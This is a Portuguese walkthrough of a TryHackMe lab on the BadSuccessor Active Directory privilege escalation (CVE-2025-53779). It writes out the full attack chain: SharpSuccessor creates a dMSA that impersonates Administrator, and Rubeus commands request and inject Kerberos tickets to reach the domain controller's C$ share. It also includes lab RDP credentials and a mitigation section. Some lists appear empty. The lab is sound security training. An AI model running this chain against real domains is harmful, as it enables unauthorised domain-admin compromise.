
Uma sala TryHackme cobrindo a exploração do CVE-2025-53779 usando windows.
Nesta sala, exploramos a técnica de escalonamento de privilégios BadSuccessor, uma vulnerabilidade que abusa de Contas de Serviço Gerenciadas Delegadas (dMSAs) no Active Directory. O ataque permite que um usuário com controle suficiente sobre um objeto dMSA personifique outra conta e potencialmente alcance privilégios de Administrador de Domínio.
Sala: https://tryhackme.com/room/adbadsuccessor
Dificuldade: Média
Data: 05/06/2026
Versão: 1.0
Objetivo: Demonstrar como as Contas de Serviço Gerenciadas Delegadas podem ser abusadas para escalonar privilégios e comprometer um ambiente Active Directory.
Papel: Terry Byte (tbyte)
Meta: Avaliar a segurança de um ambiente Active Directory recém-implantado e determinar se ele é vulnerável ao ataque BadSuccessor.
O ataque consiste em duas fases principais:
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
Vá para o diretório da Prova de Conceito:
cd C:\PoC
Verifique o conteúdo: dir
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
notepad Get-BadSuccessorOUPermissions.ps1
.\Get-BadSuccessorOUPermissions.ps1
Use o SharpSuccessor para criar uma Conta de Serviço Gerenciada Delegada que personifica a conta do Administrador:
.\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
O que Acontece?
Use o Rubeus para obter um Tíquete de Concessão de Tíquete delegado (TGT):
.\Rubeus.exe tgtdeleg /nowrap
O comando retorna um tíquete Kerberos codificado em Base64.
Copie o tíquete gerado.
.\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Resultado:
Um novo tíquete Kerberos é injetado na memória para a conta dMSA.
Aproveite o tíquete dMSA para obter acesso aos serviços executados no contexto do Administrador:
.\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Resultado:
dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
Leia a flag armazenada na área de trabalho do Administrador:
Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
Flag obtida com sucesso.
O BadSuccessor demonstra como as Contas de Serviço Gerenciadas Delegadas podem introduzir caminhos de escalonamento de privilégios em ambientes Active Directory. O Active Directory serve como a espinha dorsal de identidade de muitas organizações; vulnerabilidades que afetam o Kerberos e a delegação de contas podem ter consequências graves.
Um atacante com permissões suficientes sobre um objeto dMSA pode:
Para mitigar o BadSuccessor (CVE-2025-53779), as organizações devem aplicar prontamente as atualizações de segurança da Microsoft, restringir e revisar as permissões de dMSA, monitorar atividades suspeitas do Kerberos, auditar relações de delegação e aplicar o princípio do menor privilégio. Revisões regulares das configurações de delegação do Active Directory podem ajudar a identificar e reduzir possíveis caminhos de escalonamento de privilégios.
Esta sala proporcionou uma valiosa experiência prática com: